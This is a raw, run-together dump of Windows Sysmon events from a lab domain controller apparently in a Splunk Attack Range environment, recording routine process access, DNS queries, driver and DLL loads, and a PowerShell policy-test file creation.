13:34:29.689{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E65-6005-7800-00000000A301}3212C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.689{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E65-6005-7800-00000000A301}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.507{59A5CD1D-8E65-6005-7800-00000000A301}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.048{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.digicert.com1460-C:\Windows\sysmon64.exe 22542200x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.006{59A5CD1D-8E56-6005-2C00-00000000A301}2588win-dc-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.1460-C:\Windows\System32\lsass.exe 22542200x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.705{59A5CD1D-8E46-6005-1100-00000000A301}1172wpad1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:30.642{59A5CD1D-8E46-6005-1100-00000000A301}1172time.windows.com1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.736{59A5CD1D-8E56-6005-2E00-00000000A301}246465.199.90.95.in-addr.arpa.1460-C:\Windows\sysmon64.exe 22542200x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:29.736{59A5CD1D-8E56-6005-2E00-00000000A301}2464f.f.f.f.6.d.4.8.b.4.e.9.0.1.8.9.0.0.0.0.0.0.0.0.1.0.0.0.0.0.f.7.ip6.arpa.1460-C:\Windows\sysmon64.exe 22542200x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.736{59A5CD1D-8E56-6005-2E00-00000000A301}24640.0.0.0.0.0.0.0.0.0.1.0.c.0.c.d.0.0.0.0.0.0.0.0.1.0.0.0.0.0.f.7.ip6.arpa.1460-C:\Windows\sysmon64.exe 644600x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.393C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 644600x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.330C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 644600x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.315C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:34.735{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:34.735{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:34.735{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
22542200x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:33.939{59A5CD1D-8E56-6005-2E00-00000000A301}2464254.169.254.169.in-addr.arpa.1460-C:\Windows\sysmon64.exe 22542200x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:33.751{59A5CD1D-8E56-6005-2E00-00000000A301}2464255.1.0.10.in-addr.arpa.1460-C:\Windows\sysmon64.exe 734700x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.674{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\System32\lsass.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.908{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:34.423{59A5CD1D-8E56-6005-2E00-00000000A301}246412.1.0.10.in-addr.arpa.1460-C:\Windows\sysmon64.exe 13241300x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.985{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005da) 
10341000x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.985{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.985{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.938{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.938{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.938{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3dnbasr4.bxl.ps12021-01-18 13:34:38.938 10341000x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.938{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.923{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E6E-6005-7D00-00000000A301}41724216C:\Windows\system32\conhost.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 